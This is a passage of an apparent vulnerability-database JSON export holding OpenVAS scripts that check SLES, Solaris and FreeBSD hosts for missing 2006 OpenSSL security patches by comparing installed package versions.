"http://plugins.openvas.org/nasl.php?oid=136141256231065603", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5018586.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl-devel\n openssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5018586 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65603\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.7d~15.29\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:05", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 113713-28", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855735", "href": "http://plugins.openvas.org/nasl.php?oid=855735", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 113713-28\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855735);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"113713-28\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for pkg utilities 113713-28\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-113713-28-1\");\n\n script_summary(\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-28\", package:\"SUNWarc SUNWcsu SUNWcsr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:59", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 114568-26", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855346", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 114568-26\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855346\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114568-26\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for pkg utilities 114568-26\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114568-26-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114568-26\", package:\"SUNWarc SUNWcsr SUNWhea SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:23", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 113713-28", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855735", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 113713-28\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855735\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"113713-28\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for pkg utilities 113713-28\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-113713-28-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-28\", package:\"SUNWarc SUNWcsu SUNWcsr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:09", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 114568-27", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855640", "href": "http://plugins.openvas.org/nasl.php?oid=855640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 114568-27\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855640);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114568-27\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for pkg utilities 114568-27\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114568-27-1\");\n\n script_summary(\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114568-27\", package:\"SUNWarc SUNWcsu SUNWcsr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:51", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 114568-26", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855346", "href": "http://plugins.openvas.org/nasl.php?oid=855346", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 114568-26\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855346);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114568-26\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for pkg utilities 114568-26\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114568-26-1\");\n\n script_summary(\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114568-26\", package:\"SUNWarc SUNWcsr SUNWhea SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:19", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 113713-27", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855369", "href": "http://plugins.openvas.org/nasl.php?oid=855369", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 113713-27\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855369);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"113713-27\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for pkg utilities 113713-27\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-113713-27-1\");\n\n script_summary(\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-27\", package:\"SUNWarc SUNWcsr SUNWhea SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:23", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2008-09-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-2938"], "modified": "2016-09-26T00:00:00", "id": "OPENVAS:58053", "href": "http://plugins.openvas.org/nasl.php?oid=58053", "sourceData": "#\n#VID 0f37d765-c5d4-11db-9f82-000e0c2e438a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: openssl\n\nCVE-2006-2937\nOpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d allows remote\nattackers to cause a denial of service (infinite loop and memory\nconsumption) via malformed ASN.1 structures that trigger an improperly\nhandled error condition.\nCVE-2006-2938\n** RESERVED **\nThis candidate has been reserved by an organization or individual that\nwill use it when announcing a new security problem. When the\ncandidate has been publicized, the details for this candidate will be\nprovided.\nCVE-2006-2940\nOpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions\nallows attackers to cause a denial of service (CPU consumption) via\nparasitic public keys with large (1) 'public exponent' or (2) 'public\nmodulus' values in X.509 certificates that require extra time to\nprocess when using RSA signature verification.\nCVE-2006-3738\nBuffer overflow in the SSL_get_shared_ciphers function in OpenSSL\n0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has\nunspecified impact and remote attack vectors involving a long list of\nciphers.\nCVE-2006-4343\nThe get_server_hello function in the SSLv2 client code in OpenSSL\n0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows\nremote servers to cause a denial of service (client crash) via unknown\nvectors that trigger a null pointer dereference.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\nif(description)\n{\n script_id(58053);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2938\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: openssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"openssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.7l_0\")<0) {\n txt += 'Package openssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.8\")>0 && revcomp(a:bver, b:\"0.9.8d_0\")<0) {\n txt += 'Package openssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:46", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 113713-27", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855369", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 113713-27\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_sparc\";\ntag_insight = 